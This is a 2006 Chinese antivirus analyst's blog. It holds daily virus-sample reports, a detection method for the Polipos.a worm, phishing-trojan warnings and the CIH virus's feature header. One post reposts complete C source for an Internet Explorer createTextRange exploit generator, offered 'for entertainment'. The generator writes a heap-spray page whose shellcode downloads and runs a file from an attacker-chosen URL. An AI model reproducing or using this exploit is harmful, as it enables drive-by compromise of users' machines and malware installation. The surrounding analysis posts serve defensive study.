加糖苦咖啡 | daishuo's blog

我的博客搬家啦！

daishuo — Sat, 15 Jul 2006 01:24:00 GMT

已经正式落户百度空间。欢迎大家访问！

http://hi.baidu.com/daishuo

纪念4.26——CIH日

daishuo — Wed, 26 Apr 2006 10:02:00 GMT

; ******************************************************************** 
; * The Virus Program Information                                    * 
; ******************************************************************** 
; *                                                                  *
; * Designer : CIH Original Place : TTIT of Taiwan                   * 
; * Create Date : 04/26/1998 Now Version : 1.2                       * 
; * Modification Time : 05/21/1998                                   * 
; *                                                                  * 
; *==================================================================* 
; * Modification History                                             * 
; *==================================================================* 
; * v1.0 1. Create the Virus Program.                                * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                * 
; * 04/26/1998 3. Virus Code doesn't Reload into System.             * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System.     * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.      * 
; * 6. When System Opens Existing PE File, the File will be          * 
; * Infected, and the File doesn't be Reinfected.                    * 
; * 7. It is also Infected, even the File is Read-Only.              * 
; * 8. When the File is Infected, the Modification Date and Time     * 
; * of the File also don't be Changed.                               * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call      * 
; * Previous FileSystemApiHook, it will Call the Function            * 
; * that the IFS Manager Would Normally Call to Implement            * 
; * this Particular I/O Request.                                     * 
; * 10. The Virus Size is only 656 Bytes.                            * 
; *==================================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase  * 
; * it's Size... ^__^                                                * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.      * 
; * When Exception Error Occurs, Our OS System should be in          * 
; * Windows NT. So My Cute Virus will not Continue to Run,           * 
; * it will Jmup to Original Application to Run.                     * 
; * 3. Use Better Algorithm, Reduce Virus Code Size.                 * 
; * 4. The Virus "Basic" Size is only 796 Bytes.                     * 
; *==================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...        * 
; * 2. Modify the Bug of v1.1                                        * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.              * 
; ********************************************************************

P2P-Worm.Win32.Polipos.a的查杀原理(初步)

daishuo — Wed, 26 Apr 2006 01:32:00 GMT

24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，白天我看了一下这个毒，主要目的是查杀。
Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：
1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。
2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。
3、病毒入口函数是变形的，但最初几条语句总是：
push ebp
mov ebp, esp
sub esp, ??
pusha

      对Polipos.a病毒进行检测，可以从下面几点入手：
step 1、根据新增病毒节的特征，可以快速排除绝大多数正常程序；
step 2、读取病毒节数据，根据病毒入口函数初始代码的特点，全文扫描可能的病毒入口地址；
step 3、读取代码节(程序入口所在节)数据，全文扫描对可能病毒入口的调用语句。
      根据后来的实验显示，step 2找到的可能入口大约在15～25个，记录这些可能入口地址的包围盒(最大最小值)可以大幅优化step 3的执行速度。step 3可能找到多个调用语句，只选取最先找到的一个(因为病毒会在代码节后面的空隙处插入代码)。
     step 3结果不为空的样本，足以判断是病毒，误报率也应接近于0。

      通过检测模块，可以确定病毒入口地址。最基本的修复工作是：将程序中所有对病毒入口的调用语句还原成对API的调用。这里最大的难题在于，如果不搞定变形引擎，无法直接知道病毒替换了对哪个API的调用语句。
有一种间接方案可以考虑：
step 1、遍历Import表，记录所有API的位置；
step 2、全文扫描代码节，记录对各个API的引用情况；
step 3、如果step 2结果显示存在且仅存在1个未被引用的API，那么这个API就是被病毒替换的。
      需要说明的是step 2，通常编译器生成的调用API的代码有下面3种方式：
#1, call ds:[API地址]
#2, mov reg32, ds:[API地址]
    call reg32
#3, call jmp_API
jmp_API:
    jmp ds:[API地址]
     实验证明，对于病毒样本，step 3有时会找不到未被引用的API，这个概率接近15%。原因是编译器生成的代码中，对同一API可能应用不同方式的调用代码，而病毒替换的只是call ds:[API地址]这一种方式而已。
约15%清除失败的概率，使得本文描述的解决方案只能成为“初步”方案。这个初步方案的最大好处是完全绕开了变形引擎，因此实现起来工作量较小。代码完成，400行左右的规模，准备随KV 4月26日上午升级入库。

昨日病毒(2006.04.03)

daishuo — Tue, 04 Apr 2006 12:53:00 GMT

4月3日上报次数较多的样本有： mssave.exe -------- 562; extrmous.exe -------- 528; explore.exe -------- 497; guest.exe -------- 245; phost.exe -------- 218; lup.exe -------- 184; mssvcc.exe -------- 146; newname8.exe -------- 140; mousepad8.exe -------- 113; winsystems.exe -------- 108; keyboard8.exe -------- 71; 请进入全文查看它们的技术报告。

灰鸽子和网络色情钓鱼

daishuo — Sat, 01 Apr 2006 02:42:00 GMT

前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 :-|

IE createTextRange漏洞文件下载木马生成器

daishuo — Mon, 27 Mar 2006 23:14:00 GMT

IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。

在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就baidu到一些了，呵呵。

/* * * Internet Explorer "createTextRang" Download Shellcoded Exploit * Bug discovered by Computer Terrorism (UK) * http://www.computerterrorism.com/research/ct22-03-2006 * Reliable exploitation by Darkeagle of Unl0ck Research Team * http://www.milw0rm.com/exploits/1606 * * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 * Severity: Critical * Impact: Remote System Access * Solution Status: Unpatched * * E-Mail: atmaca@icqmail.com * Web: http://www.spyinstructors.com,http://www.atmacasoft.com * Credit to Kozan,Darkeagle,delikon,Stelian Ene * */ #include <windows.h> #include <stdio.h> #define BUF_LEN 0x1518 #define FILE_NAME "index.htm" char body1[] = "<input type=\"checkbox\" id=\"blah\">\r\n" "<SCRIPT language=\"javascript\">\r\n\r\n" "shellcode = unescape(\r\n" "\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n" "\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n" "\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n" "\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n" "\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n" "\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n" "\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n" "\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n" "\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n" "\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n" "\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n" "\t\"%u0065"; char body2[] = "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n" "slackspace = 20 + shellcode.length\r\n\r\n" "while (bigblock.length < slackspace)\r\n" "\tbigblock += bigblock;\r\n\r\n" "fillblock = bigblock.substring(0, slackspace);\r\n\r\n" "block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n" "while(block.length + slackspace < 0x40000)\r\n" "\tblock = block + block + fillblock;\r\n\r\n" "memory = new Array();\r\n\r\n" "for ( i = 0; i < 2020; i++ )\r\n" "\tmemory[i] = block + shellcode;\r\n\r\n" "var r = document.getElementById('blah').createTextRange();\r\n\r\n" "</script>\r\n"; int main(int argc,char *argv[]) { if (argc < 2) { printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit"); printf("\nUsage:\n"); printf(" ie_exp <WebUrl>\n"); return 0; } FILE *File; char *pszBuffer; char *web = argv[1]; char *pu = "%u"; char u_t[5]; char *utf16 = (char*)malloc(strlen(web)*5); if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memcpy(pszBuffer,body1,sizeof(body1)-1); memset(utf16,'\0',strlen(web)*5); for (unsigned int i=0;i<strlen(web);i=i+2) { sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]); strcat(utf16,u_t); } strcat(pszBuffer,utf16); strcat(pszBuffer,"%u0000\");"); strcat(pszBuffer,body2); fwrite(pszBuffer, BUF_LEN, 1,File); fclose(File); printf("\n\n" FILE_NAME " has been created in the current directory.\n"); return 1; } // milw0rm.com [2006-03-23] </body> </html>

昨日病毒(2006.03.24)

daishuo — Sun, 26 Mar 2006 12:47:00 GMT

3月23日上报次数较多的样本如下： icntrl.exe -------- 222； lup.exe -------- 149； mssvcc.exe -------- 130； wuass32.exe -------- 93； mssm32.exe -------- 86；请进入全文查看它们的技术报告。

昨日病毒(2006.03.23)

daishuo — Fri, 24 Mar 2006 13:05:00 GMT

3月23日上报次数较多的样本有： newname5.exe -------- 197； mousepad5.exe -------- 194； keyboard5.exe -------- 164； dpnss32.exe -------- 113；请进入全文查看它们的分析报告。

昨日病毒(2006.03.22)

daishuo — Fri, 24 Mar 2006 13:03:00 GMT

3月22日上报次数较多的样本有： 313.exe -------- 175； iplus.exe -------- 94；请进入全文查看它们的分析报告。

昨日病毒(2006.03.20)

daishuo — Fri, 24 Mar 2006 13:02:00 GMT

3月20日上报次数较多的样本有： bmnss.exe -------- 217； mousepad4.exe -------- 151； newname4.exe -------- 150； keyboard4.exe -------- 108；请进入全文查看它们的分析报告。

昨日病毒(2006.03.18)

daishuo — Sun, 19 Mar 2006 00:50:00 GMT

上图是一个vb木马显示的窗口，该窗口背景图片是幅截图，就是xx网上银行的登录页面。木马监视当前用户窗口的标题文字，一旦发现用户正在使用IE浏览器登录此页面，立即关闭IE窗口，并弹出自己的虚假登录窗口，诱骗用户在木马窗口上输入卡号和密码。随即把截到的内容发送至病毒作者信箱。

昨日病毒(2006.03.16-03.17)

daishuo — Sun, 19 Mar 2006 00:40:00 GMT

3月16和3月17日,上报较多的样本都是变种: 3.16日，lup.exe 121次上报；mssvcc.exe 96次上报；3.17日，newname3.exe 429次上报；mousepad3.exe 401次上报；keyboard3.exe 337次上报. 请进入全文查看它们的技术分析报告.

昨日病毒(2006.03.15)

daishuo — Thu, 16 Mar 2006 17:08:00 GMT

昨天上报次数较多的样本及其上报次数列表如下： winscntrl.exe ---- 276; Windows-fix.exe ---- 120; ~bNvD5b.exe ---- 110; win32ssr.exe ---- 39; 请进入全文查看它们的技术报告。

FrSIRT Exploit关闭了

daishuo — Thu, 16 Mar 2006 11:18:00 GMT

昨晚上bloglines看东西，发现FrSIRT Exploit有1条更新，还以为是跟MS06-012有关的PoC代码出来了，结果却是这么一条消息：

Exploits and PoCs are available to FrSIRT VNS?/b> subscribers only.

Public exploits section has been definitively closed.

FrSIRT Exploits收费了，通过它的FrSIRT Vulnerability Notification Services。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

昨日病毒(2006.03.14)

daishuo — Wed, 15 Mar 2006 19:43:00 GMT

昨天（2006.03.14）收到的病毒样本，总体来说，没有什么新鲜的东东。sys.exe、mssvcc.exe和lup.exe，是3个上报次数超过100的高波变种(Backdoor/Agobot)，技术上和以前的变种没有什么变化，可以参考昨日病毒(2006.03.13) 。

在上报次数排行榜前3位的样本文件分别是：

~DF44.tmp.exe ---- 4891
SSAddr1.dll ---- 697
stup.exe ---- 568

它们不是病毒，而是腾讯soso搜索工具条的组成部件或临时文件。从上报次数来看，腾讯搜索工具条正在迅速扩展用户。目前没有证据说明腾讯强制用户安装这个工具条，想想数以亿计的QQ用户，这点上报数字也就没什么说不过去的了。

最后，谨以下图欢迎soso加入IE工具条家族。